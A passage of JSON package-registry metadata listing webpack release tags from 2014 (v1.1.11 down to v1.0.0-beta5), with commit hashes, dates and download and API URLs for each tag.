z/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"p